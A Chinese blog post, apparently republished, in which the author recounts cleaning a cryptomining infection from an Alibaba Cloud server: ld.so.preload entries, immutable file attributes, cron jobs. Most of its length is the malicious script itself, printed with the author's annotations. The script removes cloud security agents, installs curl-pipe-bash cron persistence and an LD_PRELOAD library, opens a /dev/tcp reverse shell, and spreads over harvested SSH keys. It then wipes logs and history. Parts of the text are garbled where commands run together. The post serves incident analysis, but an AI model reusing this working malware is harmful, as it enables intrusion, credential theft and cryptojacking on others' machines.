记录一次云服务器被劫持下载了挖矿病毒的处理过程

记录一次云服务器被劫持下载了挖矿病毒的处理过程,第1张

记录一次云服务器被劫持下载了挖矿病毒的处理过程 etc被篡改导致系统中病毒 起因:

一年前买的阿里云服务器 , 买了没多久 , 因为没做什么安全措施 , 然后就莫名奇妙服务器被劫持 , 在上面下载了挖矿的一些脚本 ,当时做的处理方式 简单粗暴 直接重置了我的阿里云服务器 , 并且改了密码 , 同时在阿里云的服务器控制台 -> 安全组规则中 关掉了掉了脚本来源的IP地址的出入权限 ,

 之后的一年 都一直风平浪静 ,   知道昨天 , 手贱 ,,,,, 觉得过去很久了 应该没啥了 ,  就删掉了那条规则, 也就是等同于放开了那个IP对本机的访问,,  几个小时后, 就收到了阿里云的各种短信、邮件、app等通知 , 告知我服务器存在恶意脚本执行 , 问题具体通知详情内容如下图 : 

 然后就麻了...是真麻了  ,  又来 , ,,,上图右上角可以看到 ,  阿里云提供了"处理"按钮 , 但我没看到,,,,

后俩看处理提供的方式就是找到恶意脚本, 然后将其关停

问题排查

登录服务器查看问题就出现了 如下情况

 满屏的ERROR 日志 , 不管输入什么命令 , 都回打印这些 , 严重影响了使用

ERROR: ld.so: object '/usr/local/lib/pscan.so' from /etc/ld.so.preload cannot be preloaded: ignored.
ERROR: ld.so: object '/usr/local/lib/bioset.so' from /etc/ld.so.preload cannot be preloaded: ignored.
ERROR: ld.so: object '/usr/local/lib/mscan.so' from /etc/ld.so.preload cannot be preloaded: ignored.
ERROR: ld.so: object '/usr/local/lib/kswapd0.so' from /etc/ld.so.preload cannot be preloaded: ignored.
ERROR: ld.so: object '/usr/local/lib/zrab.so' from /etc/ld.so.preload cannot be preloaded: ignored.

注释:

1.Linux下的.so是基于Linux下的动态链接,其功能和作用类似与windows.dll文件

2.ld.so命令的周期是发生在run-time的,名字叫动态链接器/加载器。它的作用体现在运行时。比如你链接了指定的库,它运行的时候会根据指定的路径去加载指定的库

 服务器控制台的所有监控数据都能看出来服务器这时候不正常 

 

根据阿里云的提示是有恶意脚本在执行 ,  然后使用  top -c  查看进程  , 发现了高耗内存的一个未知进程, CPU占用率竟然达到了98%

 第一件事就是杀进程,CPU就降了下去。但是过一会就又开始升上来. 确定问题没这么简单之后 , 就开始去查这个文件到底是谁在影响

后通过这边博客 https://my.oschina.net/u/4559667/blog/4996218 看到打开的恶意脚本, 发现脚本一开始就直接kill 掉了能找到的阿里云的所有安全插件 , 而且还安装了定时器

 问题修复

首先, 服务器在执行命令的时候   ,  总会打印的那些日志  , 是因为 /etc/ld.so.preload 该文件指定了若干需要加载的类库, 这时候 我们就需要删掉这个文件 , 或者删掉这个文件里面的内容  , 来保证在运行指令前不去加载各种类库

删掉  /etc/ld.so.preload,或者像该文件内写进空字符串 , 覆盖掉内容 ,  但是我看大部分博客都只说了怎么去删 rm -rf  , 或者 怎么去写  vim , 都对个文件没效果  , 总会提示 权限不足   , 于是使用chmod -R 777  修改读写权限 , 你会这样还是回提示不能改变该文件  ,  当你发现什么命令都对这个文件不管用的时候 执行下命令 chattr -ai /etc/ld.so.preload,再删除 ,就可以了 

rm: cannot remove ‘ld.so.preload’: Permission denied

 

先处理掉定时器 , 删掉linux下的所有定时器

rm -rf /var/spool/cron/g" | xargs -I % kill -9 % netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s//.*//g" | xargs -I % kill -9 % netstat -antp | grep '23.94.24.12' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % netstat -antp | grep '134.122.17.13' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % netstat -antp | grep '66.70.218.40' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % netstat -antp | grep '209.141.35.17' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % echo "123" netstat -antp | grep '119.28.4.91' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % netstat -antp | grep '101.32.73.178' | awk '{print $7}' | sed -e 's//.*//g' | xargs -I % kill -9 % netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % ps -fe | grep '/usr/sbin/sshd' | grep 'sshgood' | grep -v grep | awk '{print $2}' | sed -e 's//.*//g' | xargs -I % kill -9 % ps aux | grep -a -E "kdevtmpfsi|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9 ## 黄嚯嚯: 干掉阿里云安全服务 der(){ if ps aux | grep -i '[a]liyun'; then (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove rm -rf /usr/local/cloudmonitor elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi sleep 1 echo "DER Uninstalled" } der if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi echo $DLB url="w.apacheorg.top:1234" liburl="http://w.apacheorg.top:1234/.libs" cronlow(){ cr=$(crontab -l | grep -q $url | wc -l) if [ ${cr} -eq 0 ];then crontab -r (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab - else echo "cronlow skip" fi } ## 黄嚯嚯: 查杀所有占用cpu超过50%的进程 , 为了后续挖矿脚本运行准备 kills() { /bin/ps axf -o "pid %cpu command" |grep -v river | awk '{if($2>50.0) print $1}' | while read procid do kill -9 $procid done } kills if [ -w /usr/sbin ]; then SPATH=/usr/sbin else SPATH=/tmp fi echo $SPATH ## 黄嚯嚯: 开始准备自己的定时任务 , 并且将主要文件解锁 , chattr -i echo 'handling download itself ...' if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151|5.196.247.12|bash.givemexyz.xyz|194.156.99.30|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==|bash.givemexyz.in|205.185.116.78" then chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 crontab -r fi if crontab -l | grep "$url" then echo "Cron exists" else apt-get install -y cron yum install -y vixie-cron crontabs service crond start chkconfig --level 35 crond on echo "Cron not found" echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/`whoami` echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/apache echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /etc/cron.d/nginx echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /var/spool/cron/`whoami` mkdir -p /var/spool/cron/crontabs echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -shn##" > /var/spool/cron/crontabs/`whoami` mkdir -p /etc/cron.hourly echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1 echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down fi chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down ## 黄嚯嚯: 这是一个很恶毒 的函数 , 闯进你的服务器 , 还要那你家钥匙 , 注意后面的 *** 作 , 拿到服务器信息后 , 狗东西又将你的信息打包发走了 localgo() { echo "localgo start" myhostip=$(curl -sL icanhazip.com) KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub) KEYS2=$(cat ~/.ssh/config /home.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'}) KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq) HOSTS=$(cat ~/.ssh/config /home.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}") HOSTS3=$(cat ~/.bash_history /home.ssh/known_hosts /home.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq) sshports=$(cat ~/.bash_history /home/g' | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "$a22") userlist=$(echo "$USERZ $USERZ2" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/./d') hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-) keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' 'n' | nl | sort -u -k2 | sort -n | cut -f2-) i=0 for user in $userlist; do for host in $hostlist; do for key in $keylist; do for sshp in $sshports; do ((i++)) if [ "${i}" -eq "20" ]; then sleep 5 ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null & i=0 fi #Wait 5 seconds after every 20 attempts and clean up hanging processes chmod +r $key chmod 400 $key echo "$user@$host" ## 黄嚯嚯: 打包发走 ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" done done done done # scangogo echo "local done" } MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283" MD5_2_XMR=`md5sum $SPATH/.libs | awk '{print $1}'` if [ "$SPATH" = "/usr/sbin" ] then chattr -ia / /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null if [ "$MD5_1_XMR" = "$MD5_2_XMR" ] then if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so export LD_PRELOAD=/usr/local/lib/libs.so sed -i 's//usr/local/lib/ini.so//' /etc/ld.so.preload sed -i 's//usr/local/lib/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $DLB $SPATH/.inis http://$url/inis chmod +x $SPATH/.inis 2>/dev/null nohup $SPATH/.inis & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & else echo "ok" chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so sed -i 's//usr/local/lib/ini.so//' /etc/ld.so.preload sed -i 's//usr/local/lib/libs.so//' /etc/ld.so.preload export LD_PRELOAD=/usr/local/lib/libs.so echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo fi localgo else chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null chattr -ai /usr/sbin/.libs 2>/dev/null chattr -ai /usr/sbin/.inis 2>/dev/null rm -f $SPATH/.libs rm -f $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB /usr/local/lib/libs.so http://$url/libs.so $DLB $SPATH/.ini http://$url/inis export LD_PRELOAD=/usr/local/lib/libs.so sed -i 's//usr/local/lib/ini.so//' /etc/ld.so.preload sed -i 's//usr/local/lib/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ia /usr/local/lib/libs.so chattr +ia /usr/local/lib/inis.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo fi else if [ "$MD5_1_XMR" != "$MD5_2_XMR" ] then $SPATH/.libs chattr -ai $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB $SPATH/.inis http://$url/inis chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so sed -i 's//usr/local/lib/ini.so//' /etc/ld.so.preload sed -i 's//usr/local/lib/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ia /usr/local/lib/libs.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo cronlow else cronlow if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & else echo "ok" fi fi fi ## 黄嚯嚯: 抹掉作案现场痕迹 echo 0>/root/.ssh/authorized_keys echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron echo 0>~/.bash_history ## 黄嚯嚯: 抹掉历史命令执行记录 history -c 2>/dev/null 关于chattr  命令 和 chmod 命令

1 . 设置有 i 属性的文件,即便是 root 用户,也无法删除和修改数据
2. chattr与chmod这个命令相比,chmod只是改变文件的读写、执行权限,更底层的属性控制是由chattr来改变的
3.只 有拥有root权限,才拥有设置chattr的权限

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5720255.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-18
下一篇 2022-12-18

发表评论

登录后才能评论

评论列表(0条)

保存